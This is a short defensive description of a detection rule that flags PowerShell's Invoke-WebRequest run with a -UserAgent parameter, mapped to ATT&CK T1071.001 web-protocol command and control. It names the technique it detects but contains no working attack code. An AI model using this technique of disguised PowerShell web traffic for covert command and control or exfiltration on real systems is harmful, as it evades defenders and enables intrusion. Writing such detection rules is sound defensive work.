This detection rule targets the usage of PowerShell's `Invoke-WebRequest` command, specifically when it is invoked with a `-UserAgent` parameter. Adversaries often leverage such web protocols to communicate with remote systems as a method of command and control (C2), blending their traffic with legitimate web traffic to evade detection. The requirement for this rule is that script block logging must be enabled on the Windows system to capture the relevant PowerShell commands. When the specified command and parameter are detected, an alert will be triggered, helping identify potential C2 activities. This technique aligns with the tactics outlined in ATT&CK T1071.001, which identifies exfiltration and command and control traffic disguised as web traffic. It emphasizes the importance of monitoring PowerShell activity to detect sophisticated threats that utilize native tooling for malice.